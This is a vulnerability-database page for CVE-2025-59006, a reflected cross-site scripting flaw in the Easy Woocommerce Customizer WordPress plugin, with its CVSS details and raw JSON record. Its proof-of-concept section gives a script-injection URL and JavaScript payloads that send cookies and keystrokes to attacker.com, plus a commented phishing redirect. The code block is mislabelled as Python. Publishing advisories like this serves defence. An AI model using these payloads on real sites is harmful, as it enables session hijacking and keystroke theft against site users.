Security Vulnerability Report
中文
CVE-2025-59006 CVSS 7.1 HIGH

CVE-2025-59006

Published: 2025-10-22 15:15:54
Last Modified: 2026-04-27 20:16:24

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in themebon Easy Woocommerce Customizer easy-woocommerce-customizer allows Reflected XSS.This issue affects Easy Woocommerce Customizer: from n/a through <= 1.0.2.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Easy Woocommerce Customizer <= 1.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-59006 PoC: Reflected XSS in Easy Woocommerce Customizer --> <!-- Attack Scenario: Malicious URL injection via plugin parameter --> <!-- Step 1: Generate malicious URL --> <!-- Target: WordPress site with Easy Woocommerce Customizer <= 1.0.2 --> <!-- Replace 'target.com' with actual vulnerable site domain --> <!-- Malicious URL Example --> <!-- http://target.com/?easy_wc_customizer_param="><script>alert('XSS')</script>" --> <!-- Step 2: Cookie Stealing PoC --> <script> // Extract session cookies var cookies = document.cookie; // Send to attacker-controlled server var img = new Image(); img.src = 'http://attacker.com/steal?c=' + encodeURIComponent(cookies); </script> <!-- Step 3: Session Hijacking PoC --> <script> // Create XMLHttpRequest to steal data var xhr = new XMLHttpRequest(); xhr.open('GET', 'http://attacker.com/log?data=' + btoa(document.cookie), true); xhr.send(); // Alternatively, redirect user to fake login // window.location.href = 'http://attacker.com/phishing?redirect=' + encodeURIComponent(window.location.href); </script> <!-- Step 4: Keylogger PoC --> <script> document.onkeypress = function(e) { var key = e.key || e.code; new Image().src = 'http://attacker.com/klog?k=' + key; } </script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59006", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:15:53.587", "lastModified": "2026-04-27T20:16:23.840", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in themebon Easy Woocommerce Customizer easy-woocommerce-customizer allows Reflected XSS.This issue affects Easy Woocommerce Customizer: from n/a through <= 1.0.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/easy-woocommerce-customizer/vulnerability/wordpress-easy-woocommerce-customizer-plugin-1-0-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}